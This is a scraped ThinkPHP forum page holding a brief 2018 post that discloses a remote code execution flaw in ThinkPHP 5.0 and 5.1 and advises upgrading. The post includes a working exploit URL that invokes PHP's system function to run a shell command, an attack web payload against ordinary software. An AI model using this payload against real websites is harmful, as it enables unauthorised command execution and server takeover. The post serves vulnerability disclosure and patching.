新版官网
文档
应用
扩展
市场
社区
云服务
搜索
系统检测到您的用户名不符合规范:
用户名
框架的一个权限漏洞被发现,可以遍历网站目录权限
浏览:1886
发布日期:2018/12/12
分类:ThinkPHP5专区
http://www.xxxxx.com/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-al
由于框架对控制器名没有进行足够的检测,会导致在没有开启强制路由的情况下引发getshell漏洞。该漏洞影响5.0和5.1版本。
提升办法:升级到最高版本
最佳答案
评论(
)
相关
后面还有
条评论,
点击查看>>
评论支持使用[code][/code]标签添加代码
您需要登录后才可以评论
登录
|
立即注册
huang92
12-30
tp6 join连表查询后无法分页
斯人若彩虹
12-30
TP5.1 关于在Model里的try catch事件
ynkszx
12-25
thinkphp6多应用模式,session不能共享的问题
yutiany
12-24
进销存管理系统源码|ERP源码开发
驹皓
12-23
订单产品表怎么设计
收藏
赞
评论
daneas
积分:1285
等级:LV3
热点推荐
1
比RBAC更好的权限认证方式(Auth类认证)
2
浅谈 PHP 与手机 APP 开发(API 接口开发)
3
ThinkPHP微信demo实例
4
Nginx下实现pathinfo及ThinkPHP的URL Rewrite模式支持
5
ThinkPHP(RBAC)权限管理系统视频教程(完结^_^)
最新更新
1
tp6 join连表查询后无法分页
2
TP5.1 关于在Model里的try catch事件
3
thinkphp6多应用模式,session不能共享的问题
4
进销存管理系统源码|ERP源码开发
5
订单产品表怎么设计
